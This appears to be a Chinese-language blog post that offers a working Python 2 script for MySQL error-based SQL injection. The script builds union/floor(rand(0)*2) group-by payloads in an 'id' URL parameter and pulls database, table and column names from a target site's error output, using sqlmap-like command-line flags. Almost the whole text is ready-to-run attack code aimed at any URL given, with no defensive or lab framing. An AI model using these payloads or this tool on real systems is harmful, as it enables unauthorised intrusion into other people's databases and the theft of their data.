基于报错注入的Python代码

能够爆数据库，表，和字段的基于报错注入的Python代码

import re
import sys
import requests
import binascii


def Get_db(url):
    url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_schema) from information_schema.COLUMNS),0x3a3a3a)a from information_schema.tables group by a)b --+"
    resp = requests.get(url_dbs_num)
    html = resp.content
    db_num = int(re.search(r':::(\d?):::',html).group(1))
    print "Database number : %d" % db_num
    for n in xrange(0,db_num):
        url_dbs_table = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_schema from information_schema.COLUMNS limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % n
        resp = requests.get(url_dbs_table)
        html = resp.content
        db_name = re.search(r':::(.*?):::',html).group(1)
        print db_name

def Get_table(url,db_name):
    db_name = "0x" + binascii.b2a_hex(db_name)
    url_tables_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_name) from information_schema.COLUMNS where table_schema=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % db_name
    resp = requests.get(url_tables_num)
    html = resp.content
    tables_num = int(re.search(r':::(\d?):::',html).group(1))
    print "tables number : %d" % tables_num
    for n in xrange(0,tables_num):
        url_tablename = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_name from information_schema.COLUMNS where table_schema=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,n)
        resp = requests.get(url_tablename)
        html = resp.content
        table_name = re.search(r":::(.*?):::",html).group(1)
        print table_name

def Get_column(url,db_name,table_name):
    db_name = "0x" + binascii.b2a_hex(db_name)
    table_name = "0x" + binascii.b2a_hex(table_name)
    url_columns_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct column_name) from information_schema.COLUMNS where table_schema=%s and table_name=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name)
    resp = requests.get(url_columns_num)
    html = resp.content
    columns_num = int(re.search(r":::(\d?):::",html).group(1))
    print "Columns number : %d" % columns_num
    for n in xrange(0,columns_num):
        url_columns_name = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct column_name from information_schema.COLUMNS where table_schema=%s and table_name=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name,n)
        resp = requests.get(url_columns_name)
        html = resp.content
        column_name = re.search(r":::(.*?):::",html).group(1)
        print column_name


def main():
    if sys.argv[2] == '--dbs':
        Get_db(sys.argv[1])
    elif sys.argv[2] == '-D' and sys.argv[4] == '--tables':
        Get_table(sys.argv[1],sys.argv[3])
    elif sys.argv[2] == '-D' and sys.argv[4] == '-T' and sys.argv[6] == '--columns':
        Get_column(sys.argv[1],sys.argv[3],sys.argv[5])

if __name__ == '__main__':
    main()